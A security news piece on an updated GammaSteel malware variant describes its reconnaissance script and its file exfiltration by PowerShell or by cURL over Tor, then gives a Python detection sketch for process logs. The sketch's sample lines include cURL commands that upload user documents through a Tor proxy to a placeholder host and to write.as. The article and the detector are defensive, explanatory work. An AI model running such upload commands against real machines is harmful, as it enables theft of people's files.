
Russian Shuckworm APT is back with updated GammaSteel malware

One script served as a reconnaissance tool, gathering information about the computer, including system information, the name of the security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes. All of this collected information was sent back to the C2 server.

New GammaSteel variant

The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories such as Desktop, Downloads, and Documents. The targeted extensions included .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.

The new GammaSteel version uses PowerShell web requests to exfiltrate files, and if that fails, it falls back to using the cURL command-line tool with a Tor proxy to send data out. There is also code suggesting that the web service write.as was possibly used as a fallback data exfiltration channel as well.
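
For defenders, the cURL fallback described above is visible in process-creation logs. The following is an added detection sketch, not code from the article or the malware: it tags command lines where cURL uploads data through a local SOCKS proxy or to write.as. The Tor default ports, tag names, and sample command lines are assumptions constructed for the example.

```python
import re
import shlex

# Assumption, not from the article: Tor's default SOCKS ports (daemon, Tor Browser).
TOR_PORTS = {"9050", "9150"}
PROXY_FLAGS = {"-x", "--proxy", "--preproxy", "--socks4", "--socks4a", "--socks5", "--socks5-hostname"}
UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "-d", "--data", "--data-binary"}
LOCAL_PROXY = re.compile(r"^(?:socks\w*://)?(?:127\.0\.0\.1|localhost|\[::1\]):(\d+)$", re.I)
TARGET_EXT = re.compile(r"\.(?:docx?|xlsx?|pptx?|vsdx?|rtf|odt|txt|pdf)\b", re.I)
WRITE_AS = re.compile(r"^https?://(?:[\w-]+\.)*write\.as(?:[:/]|$)", re.I)

def classify(cmdline):
    """Return the set of indicator tags found in one process command line."""
    try:
        argv = shlex.split(cmdline, posix=False)  # non-POSIX keeps Windows backslashes
    except ValueError:                            # unbalanced quote in the log line
        argv = cmdline.split()
    argv = [a.strip("\"'") for a in argv]
    if not argv or not re.search(r"(?:^|[\\/])curl(?:\.exe)?$", argv[0], re.I):
        return set()
    tags = set()
    for i, arg in enumerate(argv):
        flag, _, inline = arg.partition("=")      # handles --proxy=VALUE
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        value = (inline or nxt).strip("\"'")
        if flag in PROXY_FLAGS:
            m = LOCAL_PROXY.match(value)
            if m and (flag.startswith("--socks") or value.lower().startswith("socks")):
                tags.add("local_socks_proxy")
                if m.group(1) in TOR_PORTS:
                    tags.add("tor_default_port")
        elif flag in UPLOAD_FLAGS:
            tags.add("upload")
            if TARGET_EXT.search(value):          # extensions listed in the article
                tags.add("targeted_extension")
        elif WRITE_AS.match(arg):
            tags.add("write_as")
    return tags

def is_alert(tags):
    """An upload that leaves via a local SOCKS proxy, or that goes to write.as."""
    return "upload" in tags and bool(tags & {"local_socks_proxy", "write_as"})

# Constructed sample command lines; hosts and paths are placeholders.
SAMPLES = [
    r'curl.exe -x socks5h://127.0.0.1:9050 -F "file=@C:\Users\u\Documents\plan.docx" https://upload.example.invalid/',
    r'curl.exe -d @C:\Users\u\Desktop\a.txt https://write.as/',
    r'curl.exe -x http://proxy.example.invalid:8080 -T build.log https://artifacts.example.invalid/',
]
```

The third sample, an upload through an ordinary HTTP proxy, is tagged but does not alert, which keeps routine build or backup jobs out of the queue.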
